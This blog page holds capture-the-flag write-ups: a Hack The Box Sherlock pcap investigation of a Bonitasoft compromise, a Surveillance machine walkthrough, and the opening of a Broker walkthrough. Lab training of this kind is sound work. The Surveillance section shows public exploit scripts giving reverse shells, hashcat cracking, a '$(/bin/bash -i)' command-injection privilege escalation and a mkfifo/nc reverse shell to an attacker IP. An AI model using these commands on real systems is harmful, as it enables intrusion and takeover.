Ducksec

I Like

Main Info

About Me

I'm Ducksec and I like

Hi! My name is Ducksec.

Im a Pentester, Ethical Hacker, Security Consultant and animal lover with a passion for securing systems, networks and personal privacy. This blog is a place to post CTF wrtiteups, tips and other articles which I hope will help others as many others have helped me.


15 years experience in IT in a variety of verticals including Aviation and Helathcare, everything from Teir 1 Helpdesk to Sysadmin, Web Developer and now, Security Testing and Consulting. About 70 industry certifications at this point, always learning more.


Cat person, Continues to belive the Crows will win an AFL Grand Final (Maybe not this year...)

HTB and other CTF's

Latest Writeups ( all )

  • Writeups

    Sherlocks are a new offering from HackTheBox - they’ve been available since the tail end of 2023 but I’ve been busy and have only just had time to dive into them. Rather than focusing on offensive security techniques, sherlocks provide a great opportunity to sharpen your blue teaming skills - and, so far I think they’re great fun! Here, there’s no flags to capture - rather you need to obtain information to solve a series of tasks, it’s quite similar to the approach used on HTB Academy. Meerkat is rated as “easy” by HackTheBox - it’s a great place to start with sherlocks, so let’s dive in!

    Scenario

    Sherlocks come with a bit of scenario information which can help you along the way with the tasks - I wish HTB Machines also did this! For Meerkcat, we get:

    As a fast growing startup, Forela have been utilising a business management platform. Unfortunately our documentation is scarce and our administrators aren’t the most security aware. As our new security provider we’d like you to take a look at some PCAP and log data we have exported to confirm if we have (or have not) been compromised.

    There’s also a a zip file to download, which contains a .pcap file with network traffic from the time of the suspected compromise as well as a .json file which seems to list some security events which were logged at the same time.

    We’ll open up the pcap file in wireshark - the json file is also worth a look through, but I was able to complete all the tasks just using the pcap. Let’s now work through the tasks.

    Tasks

    1 - We believe our Business Management Platform server has been compromised. Please can you confirm the name of the application running?

    First of all, we’ll want to get our bearings and figure out which system is hosting the business management platform - a good way to start analysing a pcap is to get a feel for which systems are sending the most traffic. Often (but not always) these will be of the most interest. We can easily find this out by choosing

    Statistics- > ipv4 statistics -> all addresses from the menu:

    172.31.6.44 is clearly the busiest host in this capture, and we also have significant traffic from 156.146.62.213, 34.207.150.13, 54.144.148.213, 95.181.232.30, and 138.199.59.221.

    As a starting point, let’s filter the packets for those destined to 172.31.6.4 - in the wireshark filter bar, we can type : ip.dst == 172.31.6.44 to do this easily.

    Browsing through the traffic we can quickly see there’s some HTTP traffic heading to an endpoint called /bonita/loginservice

    Bonita sounds like it could be the business management service, and a quick google confirms this is the case.

    Answer Number 1: Bonitasoft.

    We believe the attacker may have used a subset of the brute forcing attack category - what is the name of the attack carried out?

    In order to answer this one, let’s explore the traffic a bit further - we can filter our results down even more at this point too. Right now we’re only going to be interested in POST requests (ie. login requests) to the business management system so let’s add && http.request.method == POST to our filter. Being able to quickly filter traffic to find the information we’re interested in is one of wiresharks best features, so its worth experimenting a little if this is new to you!

    Now, we only have relevant traffic in view - these are all login attempts directed to the relevant server - clicking on a packet allows us to see the content (in the bottom pane) and working through these attempts reveals different usernames and passwords being submitted. More importantly for this task, we notice that sets of credentials (rather than multiple usernames with a single password at a time or vice versa) are being used - so the correct term is “credential stuffing”. We can also confirm that 156.146.62.312 is probably the primary attacker machine, since this is where each of these login attempts originates from.

    Answer Number 2: Credential Stuffing

    Does the vulnerability exploited have a CVE assigned - and if so, which one?

    There were two ways to approach this task - I simply kept scrolling through the requests here, until I saw an interesting one which jumped out at me:

    As you can see, packet numbers 2918 and 2925 don’t seem to be the same credential stuffing attack, rather we’ve got an unusual string in a request to an API endpoint - at this point, I googled “i18ntranslation bonitasoft” (Note- If you’re wondering: that ? is the query string delimiter, and not part of the string itself) and hit on this page from Rhino Security Labs:

    An alternative approach here would have been to check the json file with the security alerts - it does indeed have some warnings for CVE-2022-25237.

    Answer Number 3: CVE-2022-25237

    Which string was appended to the API URL path to bypass the authorization filter by the attacker’s exploit?

    Too easy - we already have that one!

    Answer Number 4: i18ntranslation

    How many combinations of usernames and passwords were used in the credential stuffing attack?

    For this one, we’ll want to filter down to find all of the requests to the login endpoint - we can do this with:

    http.request.method == "POST" && http.request.uri contains "/bonita/loginservice"

    We can see from the bottom of the wireshark window that this gives us 118 packets - however that’s not right answer - some of these packets are duplicates using some installer credentials:

    So, let’s update our filter to get rid of those:

    http.request.method == "POST" && http.request.uri contains "/bonita/loginservice" && !(http contains "install")

    I’m not sure if HTB are including this install/install combination as part of their credential stuffing count, I’ll assume not but keep in mind that I might need to add one more to my answer later. This filter now gives 59 packets, but - this isn’t the right answer either - looking through, there’s still a duplicate or two in there.

    To make things speedy, I’ll output the packets to a file, then use a bit of bash-fu to solve this one:

    Since the .pacp I’ve exported from wireshark is a binary rather than a text format, I’ll need to use the strings command to get the content, then pass this to grep, get strings matching “username” (which is present i all the login attempts), then I’ll use cut to separate the data at the = mark, and print out the second field (ie, the part after the =) - visually this gives something like this:

    $ strings creds.pcapng | grep username | cut -d = -f 2 | uniq  
    Clerc.Killich%40forela.co.uk&password 
    Lauren.Pirozzi%40forela.co.uk&password 
    <SNIP>
    Mathian.Skidmore%40forela.co.uk&password 
    Gerri.Cordy%40forela.co.uk&password 
    seb.broom%40forela.co.uk&password 
    

    Finally, I’ll pass this to wc (with the -l argument to get the number of lines)

    $strings creds.pcapng | grep username | cut -d = -f 2 | uniq | wc -l

    This gives me 56, which is the right answer. If you wanted an easier way of doing that, you could also just count the different logins by working through each packet. Something like this works better at scale however.

    Answer Number 5: 56

    Which username and password combination was successful?

    To solve this one, it’s possible to simply work through the packets using a filter like this:

    ip.src_host == 172.31.6.44 && ip.dst_host == 156.146.62.213 && http

    To see all the HTTP response packets from the business server to the attacker - we can work through this looking for a 2XX code, which will indicate success:

    We can find the login which was valid by working through the communications here - or, using out knowledge of HTTP response codes, we can make things really fast by searching for a 204 (login success!) response.

    This approach quickly finds the relevant packet, and the credentials which were used. In addition, we can see here that more than one IP was able to successfully authenticate - 138.199.59.221 also logged in. Let’s note that.

    If we explore the JSON format packets which follow this response, we can also see evidence of the attacker utilising the POC script provided in the Rhino Security Labs article, which further confirms the attack which took place.

    Answer Number 6: seb.broom@forela.co.uk:g0vernm3nt

    If any, which text sharing site did the attacker utilise?

    Let’s now “zoom out” a little, and get a broader view at what’s happening as part of this attack - we know that the attacker used a POC for the relevant CVE to gain access to the server, and it looks like they also used more than one host as part of the attack. From here, we’ll therefore filter with ip.host == 172.31.6.44 && http to get all of the http traffic to the business server again. Scrolling through, we can see the attacker exploiting the vulnerability to run cat /etc/passwd and then again to use wget to grab a file with wget https://pastes.io/raw/bx5gcr0et8 That’s our answer for this one!

    Here were finding the file we need in the packet view:

    Answer Number 7: Pastes.io

    Please provide the filename of the public key used by the attacker to gain persistence on our host.

    Let’s go and check out the file which is being downloaded here;

    So, this file contains a curl command which will download another text file (also from pastes.io) before appending it to the authorized_keys file. The content of pastes.io/hffgra4unv will be the attackers public key - and adding it to the systems authorized_keys file will provide them with a persistent way to log in using SSH.

    Answer Number 8: hffgra4unv

    Can you confirmed the file modified by the attacker to gain persistence?

    Another easy one, we already have this information!

    Answer Number 9: /home/ubuntu/.ssh/authorized_keys

    Can you confirm the MITRE technique ID of this type of persistence mechanism?

    Finally, a quick visit to the MITRE ATT&CK website and a search for SSH Authorized keys will allow us to find the technique ID : https://attack.mitre.org/techniques/T1098/004/

    Answer Number 9: T1098.004

    Final thoughts

    I really enjoyed Meerkat and I love the idea of sherlocks! Recently, I’ve felt that HTB machines have been becoming more and more nuanced and often, a bit obscure - this makes sense, it’s a gamified platform and they want to keep players interested, however I much prefer challenges which feel relevant to real world security. Sherlocks (so far at least) feel much more relevant and a great way to sharpen your blue teaming skills.

    See you in the next one!

  • Writeups

    Surveillance is a Medium difficulty box from HackTheBox, which includes plenty of enumeration, remote code execution, password reuse, command injection and some port forwarding. This was a fun box so let’s jump in!

    Gaining user access

    As usual, let’s begin with some basic enumeration - we’ll add surveillance.htb to /etc/hosts, and run nmap:

    Nmap scan report for surveillance.htb (10.129.230.42)
    Host is up, received user-set (0.022s latency).
    Scanned at 2024-12-21 11:00:14 GMT for 24s
    Not shown: 65533 closed tcp ports (conn-refused)
    PORT   STATE SERVICE REASON  VERSION
    22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   256 96071cc6773e07a0cc6f2419744d570b (ECDSA)
    | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBN+/g3FqMmVlkT3XCSMH/JtvGJDW3+PBxqJ+pURQey6GMjs7abbrEOCcVugczanWj1WNU5jsaYzlkCEZHlsHLvk=
    |   256 0ba4c0cfe23b95aef6f5df7d0c88d6ce (ED25519)
    |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIm6HJTYy2teiiP6uZoSCHhsWHN+z3SVL/21fy6cZWZi
    80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
    |_http-favicon: Unknown favicon MD5: 0B7345BDDB34DAEE691A08BF633AE076
    |_http-title:  Surveillance 
    | http-methods: 
    |_  Supported Methods: GET HEAD POST
    |_http-server-header: nginx/1.18.0 (Ubuntu)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Read data files from: /usr/bin/../share/nmap
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    

    As is often the case with HackThebox, we have a webserver and not much else to play with.

    Let’s enumerate the server then! I’ll fire up feroxbuster in the background. We’ll run whatweb to get a quick overview of the technologies which power the site, then take a look at the site itself.

    WhatWeb report for http://surveillance.htb:80 
    Status   : 200 OK 
    Title   : Surveillance 
    IP     : 10.129.230.42 
    Country  : RESERVED, ZZ 
    
    Summary  : Bootstrap[4.3.1], Email[demo@surveillance.htb], HTML5, HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], JQuery[3.4.1], nginx[1.18.0], Script[text/javascript], X-Powered-By[Craft CMS], X-UA-Compatible[IE=edge]
    

    WhatWeb suggests that the page is built on Craft CMS - this will be important in a moment, but first let’s keep enumerating.

    The site itself looks like a fairly standard small business type page - the most interesting element being another reference to Caft CMS:

    Meanwhile, Feroxbuster has identified a few useful leads, including an admin page, although a few tries with “admin/admin”, “admin/password” and the usual easy wins gets us nowhere.

    <SNIP>
    200        0l        0w        0c http://surveillance.htb/.gitkeep
    200        9l       26w      304c http://surveillance.htb/.htaccess
    302        0l        0w        0c http://surveillance.htb/admin
    301        7l       12w      178c http://surveillance.htb/css
    301        7l       12w      178c http://surveillance.htb/fonts
    301        7l       12w      178c http://surveillance.htb/images
    301        7l       12w      178c http://surveillance.htb/img
    200        1l        0w        0c http://surveillance.htb/index
    <SNIP>
    

    Looking further at the page, we can notice that “Powered by Craft CMS” notice is actually a link, and that link reveals the specific version of the software - 4.4.4

    Let’s therefore google around and see if there are any known vulnerabilities for this version - indeed, there is one!

    CraftCMS suffers from a Remote Code Execution (RCE) vulnerability, identified as CVE-2024-41892. The vulnerability resides in the \craft\controllers\ConditionsController class, particularly in its beforeAction method. This method allows for the insecure creation of arbitrary objects, which in turn can lead to arbitrary file inclusion. The POC developed here by calif: https://blog.calif.io/p/craftcms-rce uses the \yii\rbac\PhpManager::loadFromFile method, which can include PHP code from an arbitrary file into CraftCMS’s log file. As always, Califs original post is worth a read!

    With a bit of searching, I find a pre-packaged python exploit, so let’s give this one a go:

    https://gist.githubusercontent.com/to016/b796ca3275fa11b5ab9594b1522f7226/raw/4742df53be0584c68d6f7550224948fc6709fea9/CVE-2024-41892-POC.md

    └──╼ **$**python3 poc2.py http://surveillance.htb 10.10.14.26 4848 
    [!] Please execute `nc -lvnp <port>` before running this script ... 
    [-] Get temporary folder and document root ... 
    [-] Write payload to temporary file ... 
    [-] Trigger imagick to write shell ... 
    [+] reverse shell is executing ...
    

    Excellent, the exploit works, and the shell comes back - we have access as www-data.

    
    └──╼ **$**nc -nvlp 4848 
    listening on [any] 4848 ... 
    connect to [10.10.14.26] from (UNKNOWN) [10.129.16.185] 35996 
    /bin/sh: 0: can't access tty; job control turned off 
    $ whoami 
    www-data 
    $ python3 -c "import pty; pty.spawn('/bin/bash')" 
    www-data@surveillance:~/html/craft/web/cpresources$ 
    

    Once I have the shell, we can use python to spawn a new pty giving us a more reasonable terminal. From here, the first priority is to enumerate the web application itself. Having not used CraftCMS myself I’m not 100% sure what to look for, but as a general rule I’m especially interested in configuration files (Especially database configuration files), backups, left over documentation or test code and other sensitive files. Before long I stumble upon this interesting looking directory:

    www-data@surveillance:~/html/craft/storage/backups$ ls -lah
    ls -lah
    total 28K
    drwxrwxr-x 2 www-data www-data 4.0K Oct 17  2024 .
    drwxr-xr-x 6 www-data www-data 4.0K Oct 11  2024 ..
    -rw-r--r-- 1 root     root      20K Oct 17  2024 surveillance--2024-10-17-202801--v4.4.14.sql.zip
    www-data@surveillance:~/html/craft/storage/backups$ 
    

    Which contains an sql backup. Let’s stand up a python server, and grab the file on our attack box.

    www-data@surveillance:~/html/craft/storage/backups$ python3 -m http.server 8181 
    </craft/storage/backups$ python3 -m http.server 8181 
    Serving HTTP on 0.0.0.0 port 8181 (http://0.0.0.0:8181/) ... 
    10.10.14.61 - - [21/Dec/2024 13:22:40] "GET /surveillance--2024-10-17-202801--v4.4.14.sql.zip HTTP/1.1" 200 -
    

    Unzipping the file gives us an sql dump file which contains exactly the sort of information were interested in:

    INSERT INTO `users` VALUES (1,NULL,1,0,0,0,1,'admin','Matthew B','Matthew','B','admin@surveillance.htb','39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec','2024-10-17 20:22:34',NULL,NULL,NULL,'2024-10-11 18:58:57',NULL,1,NULL,NULL,NULL,0,'2024-10-17 20:27:46','2024-10-11 17:57:16','2024-10-17 20:27:46');
    

    39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec looks like a hash - probably SHA256, let’s check the number of characters to confirm this - for SHA256 it should be 64 (Remember wondering why you had to learn this in Pentest+? :) )

    └──╼ **$**echo 39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec | wc -c  
    65
    

    65? That’s not right? Can you spot my error? By default, echo adds a newline character - we need to use -n to suppress this

    └──╼ **$**echo -n 39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec | wc -c  
    64
    

    Much better. So, that’s a SHA265 hash of the admin password for CraftCMS - let’s see if we can crack it with hashcat:

    └──╼ $hashcat -m 1400 hash /usr/share/wordlists/rockyou.txt  
    hashcat (v6.1.1) starting... 
    
    <SNIP>
    
    Dictionary cache hit: 
    
    * Filename..: /usr/share/wordlists/rockyou.txt 
    * Passwords.: 14344385 
    * Bytes.....: 139921507 
    * Keyspace..: 14344385 
    
    39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec:starcraft122490 
    
    

    Excellent - we now have the admin password. From here there’s two promising ways to proceed -

    1) Log into CraftCMS and enumerate further 2) See if Matthew is also a user on the box, and bank on him having re-used his password.

    I’m sure you know where I’m going to start :)

    www-data@surveillance:~/html/craft/storage/backups$ cat /etc/passwd | grep matthew
    matthew:x:1000:1000:,,,:/home/matthew:/bin/bash
    

    And the password…

    └──╼ **$**ssh matthew@surveillance.htb 
    matthew@surveillance.htb's password:  
    Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-89-generic x86_64) 
    
     \* Documentation:  https://help.ubuntu.com 
     \* Management:   https://landscape.canonical.com 
     \* Support:     https://ubuntu.com/advantage 
    
      System information as of Sun Apr 21 09:03:06 AM UTC 2024 
    
      System load:  0.0009765625    Processes:       225 
      Usage of /:  69.4% of 5.91GB  Users logged in:    0 
      Memory usage: 12%        IPv4 address for eth0: 10.129.16.185 
      Swap usage:  0% 
    
    
    Expanded Security Maintenance for Applications is not enabled. 
    
    0 updates can be applied immediately. 
    
    Enable ESM Apps to receive additional future security updates. 
    See https://ubuntu.com/esm or run: sudo pro status 
    
    
    The list of available updates is more than a week old. 
    To check for new updates run: sudo apt update 
    
    **matthew@surveillance**:**~**$ whoami 
    matthew 
    **matthew@surveillance**:**~**$ 
    

    …is reused. We now have user access as Matthew.

    Gaining root access

    Let’s begin with some basic enumeration:

    **matthew@surveillance**:**~**$ sudo -l  
    [sudo] password for matthew:  
    Sorry, user matthew may not run sudo on surveillance. 
    **matthew@surveillance**:**~**$ netstat -tulpn 
    Active Internet connections (only servers) 
    Proto Recv-Q Send-Q Local Address      Foreign Address     State    PID/Program name   
    tcp     0    0 0.0.0.0:80        0.0.0.0:*        LISTEN    -           
    tcp     0    0 0.0.0.0:22        0.0.0.0:*        LISTEN    -           
    tcp     0    0 127.0.0.1:8080      0.0.0.0:*        LISTEN    -           
    tcp     0    0 127.0.0.1:3306      0.0.0.0:*        LISTEN    -           
    tcp     0    0 127.0.0.53:53      0.0.0.0:*        LISTEN    -           
    tcp6    0    0 :::22          :::*           LISTEN    -           
    udp     0    0 127.0.0.53:53      0.0.0.0:*              -           
    udp     0    0 0.0.0.0:68        0.0.0.0:*              -          
    

    So, we cant sudo, but we do have some applications running internally - 3306 will be the database, and 53 is DNS, however 8080 is almost certainly another web app. We can use curl to check:

    matthew@surveillance:~$ curl http://localhost:8080
    
    <!DOCTYPE html>
    <html lang="en">
    <head>
      <meta charset="utf-8">
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="viewport" content="width=device-width, initial-scale=1">
      <title>ZM - Login</title>
    
    <SNIP>
    
            <div class="container">
                    <form class="center-block" name="loginForm" id="loginForm" method="post" action="?view=login"><input type='hidden' name='__csrf_magic' value="key:754dfd4f13ec07577f44aecddfa2fb8dce559637,1713690537" />
                            <input type="hidden" name="action" value="login"/>
          <input type="hidden" name="postLoginQuery" value="" />
    
                            <div id="loginError" class="hidden alarm" role="alert">
                                    <span class="glyphicon glyphicon-exclamation-sign" aria-hidden="true"></span>
                                    Invalid username or password.
                            </div>
        
                            <div id="loginform">
        
            <h1><i class="material-icons md-36">account_circle</i> ZoneMinder Login</h1>
        
                                    <label for="inputUsername" class="sr-only">Username</label>
                                    <input type="text" id="inputUsername" name="username" class="form-control" autocapitalize="none" placeholder="Username" required autofocus autocomplete="username"/>
        
                                    <label for="inputPassword" class="sr-only">Password</label>
                                    <input type="password" id="inputPassword" name="password" class="form-control" placeholder="Password" required autocomplete="current-password"/>
                                    <button class="btn btn-lg btn-primary btn-block" type="submit">Login</button>
                            </div>
                    </form>
            </div>
            
    <SNIP>        
    

    We definitely have a web app, with a login form - so let’s use ssh to port forward back to our attack box and explore this in more depth.

    └──╼ ssh -v -L 8080:127.0.0.1:8080 matthew@surveillance.htb
    

    When doing port forwarding I like to use the -v flag for verbose mode - ssh port forwarding usually works well, but it an be hard to figure out what’s going wrong (the remote application, or your ssh session) when things don’t quite click. With this connection established, any traffic I send to my localhost (127.0.0.1) on port 8080, will be directed to port 8080 on the target system, so now, we can interact with the application as if we’re on that machine.

    We’ll try logging in with the credentials, we have “admin/starcraft122490” - and we gain access.

    From the dashboard, we can quickly enumerate the version of the software v1.36.32 - so let’s again see if there are any published vulnerabilities or exploits.

    We quickly find a relevant vulnerability- CVE-2024-26035 states that ZoneMinder versions prior to 1.36.33 and 1.37.33 are vulnerable to Unauthenticated Remote Code Execution due to missing authorization checks in the snapshot action, that’s just what we’re looking for - and on github there’s another excellent POC script. https://github.com/rvizx/CVE-2024-26035

    We’ll clone the repo, and give it a go - remember that since we’re port forwarding the target IP and port will now be our own localhost, and the local port we’re using.

    └──╼ **$**python3 exploit.py -t http://127.0.0.1:8080/ -ip 10.10.14.26 -p 4141 
    [>] fetching csrt token 
    [>] recieved the token: key:635f1e26db3cdee58908aa6437824c2194ed6cd1,1713692075 
    [>] executing... 
    [>] sending payload.. 
    

    Excellent, we now have a shell as the zoneminder user:

    └──╼ $nc -nvlp 4141
    listening on [any] 4141 ...
    connect to [10.10.14.26] from (UNKNOWN) [10.129.16.185] 33738
    bash: cannot set terminal process group (1010): Inappropriate ioctl for device
    bash: no job control in this shell
    zoneminder@surveillance:/usr/share/zoneminder/www$  
    

    Once again, let’s enumerate!

    zoneminder@surveillance:/usr/share/zoneminder/www$ sudo -l 
    sudo -l 
    Matching Defaults entries for zoneminder on surveillance:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
        use_pty
    
    User zoneminder may run the following commands on surveillance:
        (ALL : ALL) NOPASSWD: /usr/bin/zm[a-zA-Z]*.pl *
    

    We have more luck with sudo -l this time - apparently the user zoneminder can execute any command that starts with /usr/bin/zm followed by zero or more alphabetical characters, ending with .pl, and potentially followed by additional arguments (denoted by *). This essentially grants the user the ability to run various ZoneMinder Perl scripts with root privileges. There’s plenty of these, but which one can we abuse?

    <SNIP>
    -rwxr-xr-x 1 root root 45421 Nov 23 2022 /usr/bin/zmupdate.pl
    -rwxr-xr-x 1 root root 8205 Nov 23 2022 /usr/bin/zmvideo.pl
    -rwxr-xr-x 1 root root 7022 Nov 23 2022 /usr/bin/zmwatch.pl
    -rwxr-xr-x 1 root root 19655 Nov 23 2022 /usr/bin/zmx10.pl
    
    

    Admittedly, I got stuck here for quite a while - since we’re able to control arguments to the script we need an argument which isn’t properly escaped and which is then passed to execor system. I grepped through all the files, but couldn’t find any candidates. What I didn’t know (not being a perl guy) was that qx is also a valid way to execute commands in perl (thanks hackthebox forum!).

    Now, I’m lLooking for invocations of qx, and we find one in zmupdate.pl - eq executes the variable $command:

       my $output = qx($command);
    

    which in turn is just a completed sqldump command - critically, the variabe $dbUser is unescaped, AND we can control it with the argument –user

    my $command = 'mysqldump';
          if ($super) {
            $command .= ' --defaults-file=/etc/mysql/debian.cnf';
          } elsif ($dbUser) {
            $command .= ' -u'.$dbUser;
            $command .= ' -p\''.$dbPass.'\'' if $dbPass;
          }
    

    So, the script is expecting an argument like --user jim - but how about if we pass a command instead? To do this, we can use a feature of bash called command expansion - in short, anything enclosed within $(...) is treated as a command to be executed by the shell, and then the output of that command replaces the command substitution. Therefore, If i pass the script $(/bin/bash -i) as an argument, rather than a username, this should end up as part of command, which will then be executed by qx, as root. Well that’s the theory anyway, let’s try it!

    zoneminder@surveillance:/usr/share/zoneminder/www$ sudo /usr/bin/zmupdate.pl --version=1 --user='$(/bin/bash -i)' --pass=ZoneMinderPassword2024 
    <ser='$(/bin/bash -i)' --pass=ZoneMinderPassword2024 
    
    Initiating database upgrade to version 1.36.32 from version 1 
    
    WARNING - You have specified an upgrade from version 1 but the database version found is 1.36.32. Is this correct? 
    Press enter to continue or ctrl-C to abort :  
    
    Do you wish to take a backup of your database prior to upgrading? 
    This may result in a large file in /tmp/zm if you have a lot of events. 
    Press 'y' for a backup or 'n' to continue : n 
    
    Upgrading database to version 1.36.32 
    Upgrading DB to 1.26.1 from 1.26.0 
    bash: cannot set terminal process group (1010): Inappropriate ioctl for device 
    bash: no job control in this shell 
    root@surveillance:/usr/share/zoneminder/www# whoami 
    whoami 
    root@surveillance:/usr/share/zoneminder/www# ls 
    ls 
    
    

    This worked in that it did provide a root shell, but I’m not able to actually see any command output - there’s a simple solution, let’s just spawn yet another shell:

    root@surveillance:/usr/share/zoneminder/www# rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.26 7777 >/tmp/f 
    < /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.26 7777 >/tmp/f 
    rm: cannot remove '/tmp/f': No such file or directory
    

    And this comes back, we’re root!

    └──╼ **$**nc -nvlp 7777 
    listening on [any] 7777 ... 
    connect to [10.10.14.26] from (UNKNOWN) [10.129.16.185] 53892 
    /bin/sh: 0: can't access tty; job control turned off 
    # whoami 
    root 
    #   
    

    Avoiding the Hack - Lessons learned

    For me, the most important takeaway from this box was just how dangerous password reuse is. Notice how, despite being able to exploit an out-of-date version of CraftCMS, it would have been impossible to get even as far as user level access without it?

    Password reuse is such a problem because it significantly negates the value of even a very strong password. starcraft122490, while not exactly a super strong password isn’t especially bad - 15 alphanumeric characters would meet many organisational password policies. For reference, Bitwardens’ password strength tester calls it “good”.

    Of course, this one exists within rockyou.txt (which is another reason your organisation needs a banned passwords list) so it would be daft to use it because everyone who’s installed Parrot OS or Kali Linux has a copy - but the fact is a password needs to be breached only once before it’s possible for an attacker to have access to it. Most breached passwords do eventually end up in lists just like rockyou.txt - and you might never know yours is included. While services which monitor for password breaches are an incredibly valuable tool in this fight, they’re not 100% reliable. Indeed, despite being in rockyou.txt - this one gets a clean bill of health over at haveibeenpwned.com

    For this reason, it’s essential that passwords are never re-used - this way, if and when they are breached the access granted to an attacker is at least limited. To provide more reliable protection (and while it can be difficult to implement) password rotation for both users and applications is a must. If you’re building an application from scratch today - especially if you’re optimising for the cloud - consider storing, and rotating passwords or keys in some form of secrets manager (eg. AWS Secrets Manager) to make automating this process much easier.

    That’s all for this one, see you next time!

  • Writeups

    Broker is an easy difficulty Linux machine hosting a vulnerable version of Apache ActiveMQ. Enumerating the version of Apache ActiveMQ shows that it is vulnerable to Unauthenticated Remote Code Execution, which is leveraged to gain user access on the target. Post-exploitation enumeration reveals that the system has a sudo misconfiguration allowing the activemq user to execute sudo /usr/sbin/nginx which can be exploited in a number of ways to gain root privilege. Let’s dive in!

    Gaining user access

    As usual, we’ll well add broker.htb to /etc/hosts, fire off nmap and see what we’ve got!

    Right away, nmap gives quite a lot of output:

    map broker.htb -sC -sV -p -  
    
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-10 13:28 GMT 
    Nmap scan report for broker.htb (10.129.65.73) 
    Host is up (0.023s latency). 
    Not shown: 65526 closed tcp ports (conn-refused) 
    PORT    STATE SERVICE   VERSION 
    22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0) 
    | ssh-hostkey:  
    |  256 3eea454bc5d16d6fe2d4d13b0a3da94f (ECDSA) 
    |_  256 64cc75de4ae6a5b473eb3f1bcfb4e394 (ED25519) 
    80/tcp   open  http    nginx 1.18.0 (Ubuntu) 
    | http-auth:  
    | HTTP/1.1 401 Unauthorized\x0D 
    |_  basic realm=ActiveMQRealm 
    |_http-title: Error 401 Unauthorized 
    |_http-server-header: nginx/1.18.0 (Ubuntu) 
    1883/tcp  open  mqtt 
    | mqtt-subscribe:  
    |  Topics and their most recent payloads:  
    |   ActiveMQ/Advisory/Consumer/Topic/#:  
    |_   ActiveMQ/Advisory/MasterBroker:  
    5672/tcp  open  amqp? 
    | fingerprint-strings:  
    |  DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie:  
    |   AMQP 
    |   AMQP 
    |   amqp:decode-error 
    |_   7Connection from client using unsupported AMQP attempted 
    |_amqp-info: ERROR: AQMP:handshake expected header (1) frame, but was 65 
    8161/tcp  open  http    Jetty 9.4.39.v20210325 
    |_http-title: Error 401 Unauthorized 
    | http-auth:  
    | HTTP/1.1 401 Unauthorized\x0D 
    |_  basic realm=ActiveMQRealm 
    |_http-server-header: Jetty(9.4.39.v20210325) 
    45975/tcp open  tcpwrapped 
    61613/tcp open  stomp    Apache ActiveMQ 
    | fingerprint-strings:  
    |  HELP4STOMP:  
    |   ERROR 
    |   content-type:text/plain 
    |   message:Unknown STOMP action: HELP 
    |   org.apache.activemq.transport.stomp.ProtocolException: Unknown STOMP action: HELP 
    |   org.apache.activemq.transport.stomp.ProtocolConverter.onStompCommand(ProtocolConverter.java:258) 
    |   org.apache.activemq.transport.stomp.StompTransportFilter.onCommand(StompTransportFilter.java:85) 
    |   org.apache.activemq.transport.TransportSupport.doConsume(TransportSupport.java:83) 
    |   org.apache.activemq.transport.tcp.TcpTransport.doRun(TcpTransport.java:233) 
    |   org.apache.activemq.transport.tcp.TcpTransport.run(TcpTransport.java:215) 
    |_   java.lang.Thread.run(Thread.java:750) 
    61614/tcp open  http    Jetty 9.4.39.v20210325 
    |_http-title: Site doesn't have a title. 
    | http-methods:  
    |_  Potentially risky methods: TRACE 
    |_http-server-header: Jetty(9.4.39.v20210325) 
    61616/tcp open  apachemq  ActiveMQ OpenWire transport 
    | fingerprint-strings:  
    |  NULL:  
    |   ActiveMQ 
    |   TcpNoDelayEnabled 
    |   SizePrefixDisabled 
    |   CacheSize 
    |   ProviderName  
    |   ActiveMQ 
    |   StackTraceEnabled 
    |   PlatformDetails  
    |   Java 
    |   CacheEnabled 
    |   TightEncodingEnabled 
    |   MaxFrameSize 
    |   MaxInactivityDuration 
    |   MaxInactivityDurationInitalDelay 
    |   ProviderVersion  
    |_   5.15.15 
    3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : 
    
    

    Let’s first take a look at the web page - based on nmap’s output, we’re expecting some kind of authorisation, since our scan returned a 401.

    broker1

    As expected, we have http basic auth in force, of course, we could brute force this - but first, let’s try some low-tech hacking here - how about some basic common credentials? - admin/password does not work, but admin/admin does!

    Now that we’ve authenticated, we can confirm that we have an installation of Apache MQ:

    broker2

    Apache ActiveMQ is an open-source message broker built on the Java Message Service (JMS) standard, designed to facilitate communication between different systems, applications, and components. It serves as a middleware, enabling asynchronous messaging by providing a reliable way for components to exchange data through messages. In the context of, say, an e-commerce platform, Apache ActiveMQ can serve as a central messaging system between the Order Processing Service, Inventory Management Service, and Shipping Service. In a cloud context the same sort of task is performed by a service like AWS Simple Notification Service. Before we start to worry about the specific setup and what ActiveMQ could be passing messages for on this box, however, we have a specific version - let’s see if we have any possible vulnerabilities to exploit right here in ActiveMQ.

